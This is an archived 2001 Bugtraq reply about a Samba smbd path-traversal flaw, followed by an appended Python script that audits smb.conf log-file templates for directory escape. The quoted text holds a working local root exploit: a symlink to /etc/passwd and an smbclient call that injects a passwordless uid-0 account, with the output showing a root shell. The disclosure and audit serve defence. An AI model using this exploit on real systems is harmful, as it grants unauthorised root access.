[21225] in bugtraq


Re: smbd remote file creation vulnerability

daemon@ATHENA.MIT.EDU (Joachim Blaabjerg)
Wed Jun 27 20:11:41 2001

Date: Tue, 26 Jun 2001 11:08:04 +0200
From: Joachim Blaabjerg <styx@mailbox.as>
To: bugtraq@securityfocus.com
Message-Id: <20010626110804.58491b4c.styx@mailbox.as>
In-Reply-To: <20010625190919.A13420@hq.alert.sk>
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

Pavol Luptak <wilder@hq.alert.sk> wrote:

> 
> [wilder@lysurus wilder]$ cat /etc/redhat-release 
> Linux Mandrake release 8.0 (Traktopel) for i586
> [wilder@lysurus wilder]$ rpm -q pam
> pam-0.74-6mdk
> [wilder@lysurus wilder]$ egrep "log file" /etc/smb.conf
> # this tells Samba to use a separate log file for each machine
>    log file = /var/log/samba/%m.log  	 (= changed from default log.%m)
> # Put a capping on the size of the log files (in Kb).
> [wilder@lysurus wilder]$ rpm -qf /usr/sbin/smbd
> samba-2.0.9-1.3mdk
> [wilder@lysurus wilder]$ ln -s /etc/passwd /tmp/x.log
> [wilder@lysurus wilder]$ smbclient //localhost/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" -n ../../../tmp/x -N
> added interface ip=10.0.0.43 bcast=10.0.0.255 nmask=255.255.255.0
> Anonymous login successful
> Domain=[UI42] OS=[Unix] Server=[Samba 2.0.9]
> [wilder@lysurus wilder]$ tail /etc/passwd
> ..
> ..
> [2001/06/25 18:46:48, 1] smbd/reply.c:reply_sesssetup_and_X(927)
>   Rejecting user 'wilder': authentication failed
> [2001/06/25 18:46:48, 0] smbd/service.c:make_connection(213)
>   ../../../tmp/x (127.0.0.1) couldn't find service 
>   toor::0:0::/:/bin/sh
> [wilder@lysurus wilder]$ su toor
> [root@lysurus wilder]#
> 
> Appending to /etc/passwd has nothing to do with pam.

No, not directly, but if your `su` uses PAM to authenticate users and PAM
reacts to the spaces in the beginning of the passwd file, it surely has
something to do with PAM. To check whether `su` uses PAM or not, try
"ldd `which su`|grep libpam"
 
<snip>

Regards

-- 
Joachim Blaabjerg
styx@mailbox.as 
www.SuxOS.org
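
Added example, not part of the original message and not Samba's code: a short audit sketch showing why the quoted `log file = /var/log/samba/%m.log` setting lets the client-supplied name `../../../tmp/x` resolve to `/tmp/x.log`, and how to flag such a template. The function names, the allow-list pattern and the sample config are assumptions constructed for illustration; path handling is lexical only and does not follow symlinks.

```python
import posixpath
import re

# Constructed sample, based on the smb.conf lines in the quoted session.
SAMPLE_SMB_CONF = """\
# this tells Samba to use a separate log file for each machine
   log file = /var/log/samba/%m.log
# Put a capping on the size of the log files (in Kb).
"""

# Hypothetical allow-list for a client-supplied machine name
# (NetBIOS names carry at most 15 usable characters).
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,15}$")


def log_file_templates(conf_text):
    """Return every 'log file' value found in smb.conf text."""
    found = []
    for line in conf_text.splitlines():
        line = line.strip()
        if not line or line[0] in "#;":
            continue  # blank line or comment
        key, sep, value = line.partition("=")
        # smb.conf ignores case and whitespace inside parameter names.
        if sep and "".join(key.lower().split()) == "logfile":
            found.append(value.strip())
    return found


def audit(template, client_name):
    """Expand %m with client_name; return (resolved_path, verdict)."""
    if "%m" not in template:
        return posixpath.normpath(template), "static"
    # Directory the administrator intended the logs to live in.
    log_dir = posixpath.normpath(posixpath.dirname(template.split("%m")[0]))
    # Lexical normalisation only: symlinks are not followed here.
    resolved = posixpath.normpath(template.replace("%m", client_name))
    inside = resolved.startswith(log_dir.rstrip("/") + "/")
    return resolved, "contained" if inside else "escapes"


if __name__ == "__main__":
    for tpl in log_file_templates(SAMPLE_SMB_CONF):
        for name in ("lysurus", "../../../tmp/x"):
            path, verdict = audit(tpl, name)
            ok = bool(SAFE_NAME.match(name))
            print(f"{tpl!r} name={name!r} -> {path} [{verdict}] safe_name={ok}")
```
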
